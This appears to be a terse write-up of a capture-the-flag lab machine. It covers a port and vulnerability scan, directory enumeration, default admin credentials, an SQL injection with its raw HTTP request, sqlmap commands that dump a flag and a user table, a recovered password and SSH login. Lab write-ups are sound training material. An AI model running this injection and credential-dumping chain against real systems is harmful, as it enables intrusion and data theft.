rustscan -a 172.16.1.12 --ulimit 5000 -- -Pn -sV --script \"'vuln'\"
Open 172.16.1.12:22
Open 172.16.1.12:21
Open 172.16.1.12:80
Open 172.16.1.12:443
Open 172.16.1.12:330680/tcp open http syn-ack Apache httpd 2.4.43 ((Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3
| http-enum:
| /blog/: Blog
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting folder w/ directory listing
|_ /webalizer/: Potentially interesting folder w/ directory listing
- No anonymous login with FTP
Feroxbuster
[####################] - 54s 2163872/2163872 0s found:75554 errors:522470
[####################] - 46s 120000/120000 2555/s http://172.16.1.12/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/img/ => Directory listing
[####################] - 46s 120000/120000 2601/s http://172.16.1.12/blog/
[####################] - 6s 120000/120000 0/s http://172.16.1.12/blog/js/ => Directory listing
[####################] - 7s 120000/120000 0/s http://172.16.1.12/blog/images/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/database/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/css/ => Directory listing
[####################] - 43s 120000/120000 2737/s http://172.16.1.12/blog/blogadmin/images/
[####################] - 50s 120000/120000 2625/s http://172.16.1.12/blog/blogadmin/
[####################] - 5s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/js/ => Directory listing
[####################] - 5s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/css/ => Directory listing
[####################] - 43s 120000/120000 2745/s http://172.16.1.12/blog/blogadmin/admin/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/webalizer/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/libs/ => Directory listing
[####################] - 40s 120000/120000 2998/s http://172.16.1.12/blog/blogadmin/templates/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/resources/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/libs/ => Directory listing
[####################] - 38s 120000/120000 3106/s http://172.16.1.12/dashboard/
[####################] - 3s 120000/120000 0/s http://172.16.1.12/blog/blogadmin/font-awesome/ => Directory listing
[####################] - 6s 120000/120000 0/s http://172.16.1.12/dashboard/images/ => Directory listing
[####################] - 34s 120000/120000 0/s http://172.16.1.12/dashboard/docs/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/stylesheets/ => Directory listing
[####################] - 38s 120000/120000 3141/s http://172.16.1.12/dashboard/de/
[####################] - 37s 120000/120000 3165/s http://172.16.1.12/dashboard/fr/
[####################] - 37s 120000/120000 3204/s http://172.16.1.12/dashboard/es/
[####################] - 37s 120000/120000 3211/s http://172.16.1.12/dashboard/ru/
[####################] - 37s 120000/120000 3210/s http://172.16.1.12/dashboard/it/
[####################] - 34s 120000/120000 3481/s http://172.16.1.12/dashboard/pl/
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/javascripts/ => Directory listing
[####################] - 34s 120000/120000 3525/s http://172.16.1.12/blog/blogadmin/hooks/
[####################] - 1s 120000/120000 0/s http://172.16.1.12/dashboard/images/addons/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/stamps/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/bitnami-xampp/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/team/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/screenshots/ => Directory listing
[####################] - 1s 120000/120000 0/s http://172.16.1.12/dashboard/images/blog/ => Directory listing
[####################] - 0s 120000/120000 0/s http://172.16.1.12/dashboard/images/flags/ => Directory listing
[####################] - 31s 120000/120000 3758/s http://172.16.1.12/dashboard/ro/
[####################] - 31s 120000/120000 3760/s http://172.16.1.12/dashboard/tr/
[####################] - 31s 120000/120000 3865/s http://172.16.1.12/dashboard/hu/
[####################] - 2s 120000/120000 0/s http://172.16.1.12/dashboard/docs/images/ => Directory listing
[####################] - 18s 120000/120000 6581/s http://172.16.1.12/dashboard/jp/-
Flound a blog app running appgini with default admin admin creds.
-
found sql injection in the request
GET /blog/category.php?id=%27 HTTP/1.1
Host: 172.16.1.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: BLOG_ADMIN=c44bee64e8a111f74362795e536dbab5; columns%2Fblog%2Fblogadmin%2Fblog_categories_view.php={%22blog_categories-name%22:true}
Upgrade-Insecure-Requests: 1
Flag 1
sqlmap -r req.txt -D flag -T flag --dumpDatabase: flag
Table: flag
[1 entry]
+------------------------------+
| flag |
+------------------------------+
| DANTE{wHy_y0U_n0_s3cURe?!?!} |
+------------------------------+Getting password for ben
sqlmap -r req2.txt -D blog_admin_db -T membership_users --columns --dump
ben passowrd: Welcometomyblog
single.phpSSH login
ssh ben@172.16.1.12
Flag 2
Location: /home/ben/flag.txt DANTE{Pretty_Horrific_PH4IL!}